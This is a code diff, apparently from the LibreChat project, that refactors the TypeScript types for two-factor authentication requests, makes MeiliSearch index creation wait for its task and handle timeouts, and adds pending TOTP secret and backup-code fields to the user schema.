export type TEnable2FAResponse = { export type TEnable2FAResponse = {
otpauthUrl: string; otpauthUrl: string;
backupCodes: string[]; backupCodes: string[];
message?: string; message?: string;
}; };
export type TVerify2FARequest = { export type TVerify2FARequest = TOTPVerificationPayload;
token?: string;
backupCode?: string;
};
export type TVerify2FAResponse = { export type TVerify2FAResponse = {
message: string; message: string;
}; };
/** /** For verifying 2FA during login with a temporary token. */
* For verifying 2FA during login with a temporary token. export type TVerify2FATempRequest = TOTPVerificationPayload & {
*/
export type TVerify2FATempRequest = {
tempToken: string; tempToken: string;
token?: string;
backupCode?: string;
}; };
export type TVerify2FATempResponse = { export type TVerify2FATempResponse = {
@ -455,30 +456,22 @@ export type TVerify2FATempResponse = {
message?: string; message?: string;
}; };
/** export type TDisable2FARequest = TOTPVerificationPayload;
* Request for disabling 2FA.
*/
export type TDisable2FARequest = {
token?: string;
backupCode?: string;
};
/**
* Response from disabling 2FA.
*/
export type TDisable2FAResponse = { export type TDisable2FAResponse = {
message: string; message: string;
}; };
/** export type TRegenerateBackupCodesRequest = TOTPVerificationPayload;
* Response from regenerating backup codes.
*/
export type TRegenerateBackupCodesResponse = { export type TRegenerateBackupCodesResponse = {
message: string; message?: string;
backupCodes: string[]; backupCodes: string[];
backupCodesHash: string[]; backupCodesHash: TBackupCode[];
}; };
export type TDeleteUserRequest = TOTPVerificationPayload;
export type TRequestPasswordReset = { export type TRequestPasswordReset = {
email: string; email: string;
}; };

View file

@ -1,7 +1,7 @@
import _ from 'lodash'; import _ from 'lodash';
import { MeiliSearch } from 'meilisearch';
import { parseTextParts } from 'librechat-data-provider'; import { parseTextParts } from 'librechat-data-provider';
import type { SearchResponse, SearchParams, Index } from 'meilisearch'; import { MeiliSearch, MeiliSearchTimeOutError } from 'meilisearch';
import type { SearchResponse, SearchParams, Index, MeiliSearchErrorInfo } from 'meilisearch';
import type { import type {
CallbackWithoutResultAndOptionalError, CallbackWithoutResultAndOptionalError,
FilterQuery, FilterQuery,
@ -581,7 +581,6 @@ export default function mongoMeili(schema: Schema, options: MongoMeiliOptions):
/** Create index only if it doesn't exist */ /** Create index only if it doesn't exist */
const index = client.index<MeiliIndexable>(indexName); const index = client.index<MeiliIndexable>(indexName);
// Check if index exists and create if needed
(async () => { (async () => {
try { try {
await index.getRawInfo(); await index.getRawInfo();
@ -591,18 +590,34 @@ export default function mongoMeili(schema: Schema, options: MongoMeiliOptions):
if (errorCode === 'index_not_found') { if (errorCode === 'index_not_found') {
try { try {
logger.info(`[mongoMeili] Creating new index: ${indexName}`); logger.info(`[mongoMeili] Creating new index: ${indexName}`);
await client.createIndex(indexName, { primaryKey }); const enqueued = await client.createIndex(indexName, { primaryKey });
const task = await client.waitForTask(enqueued.taskUid, {
timeOutMs: 10000,
intervalMs: 100,
});
logger.debug(`[mongoMeili] Index ${indexName} creation task:`, task);
if (task.status !== 'succeeded') {
const taskError = task.error as MeiliSearchErrorInfo | null;
if (taskError?.code === 'index_already_exists') {
logger.debug(`[mongoMeili] Index ${indexName} was created by another instance`);
} else {
logger.warn(`[mongoMeili] Index ${indexName} creation failed:`, taskError);
}
} else {
logger.info(`[mongoMeili] Successfully created index: ${indexName}`); logger.info(`[mongoMeili] Successfully created index: ${indexName}`);
}
} catch (createError) { } catch (createError) {
// Index might have been created by another instance if (createError instanceof MeiliSearchTimeOutError) {
logger.debug(`[mongoMeili] Index ${indexName} may already exist:`, createError); logger.warn(`[mongoMeili] Timed out waiting for index ${indexName} creation`);
} else {
logger.warn(`[mongoMeili] Error creating index ${indexName}:`, createError);
}
} }
} else { } else {
logger.error(`[mongoMeili] Error checking index ${indexName}:`, error); logger.error(`[mongoMeili] Error checking index ${indexName}:`, error);
} }
} }
// Configure index settings to make 'user' field filterable
try { try {
await index.updateSettings({ await index.updateSettings({
filterableAttributes: ['user'], filterableAttributes: ['user'],

View file

@ -121,6 +121,15 @@ const userSchema = new Schema<IUser>(
type: [BackupCodeSchema], type: [BackupCodeSchema],
select: false, select: false,
}, },
pendingTotpSecret: {
type: String,
select: false,
},
pendingBackupCodes: {
type: [BackupCodeSchema],
select: false,
default: undefined,
},
refreshToken: { refreshToken: {
type: [SessionSchema], type: [SessionSchema],
}, },

View file

@ -26,6 +26,12 @@ export interface IUser extends Document {
used: boolean; used: boolean;
usedAt?: Date | null; usedAt?: Date | null;
}>; }>;
pendingTotpSecret?: string;
pendingBackupCodes?: Array<{
codeHash: string;
used: boolean;
usedAt?: Date | null;
}>;
refreshToken?: Array<{ refreshToken?: Array<{
refreshToken: string; refreshToken: string;
}>; }>;